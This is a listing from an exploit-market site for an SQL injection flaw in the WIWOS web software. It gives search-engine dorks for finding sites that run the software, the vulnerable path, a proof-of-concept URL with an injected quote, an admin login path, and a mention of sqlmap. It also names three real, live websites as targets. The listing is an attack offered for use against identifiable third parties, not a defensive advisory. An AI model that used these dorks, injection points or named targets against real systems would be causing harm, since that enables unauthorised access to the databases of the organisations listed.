[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WIWOS Enpowering Web Solutions SQL Injection Vulnerability

Author
larcenciels
Risk
[
Security Risk High
]
0day-ID
0day-ID-21126
Category
web applications
Date add
18-08-2013
Platform
php
####################################################################
.:. Author          : larcenciels
.:. Contact        : larcenciels@idblackhat.org | third1337@gmail.com
.:. Site               : http://winnerawan.com/
####################################################################
Dork: "Enpowered by: wiwos"
dork: intext:"Enpowered by: wiwos"
vuln: apps/ProductManager/
i use sqlmap
poc: http://www.site.com/apps/ProductManager/public.product.php?id=S1-4441418643'
admin url: http://site.com/login.php?return_url=/admin/

####################################################################
live target:
http://www.modentraining.edu.my/apps/ProductManager/public.product.php?id=S1-4441418643'
http://www.tastefully.com.my/apps/pagemaker/public.view.php?id=S1-305221630'
http://www.goldenland.com.my/apps/ProductManager/public.product.php?id=S1-2077718461'

#  0day.today [2024-12-25]  #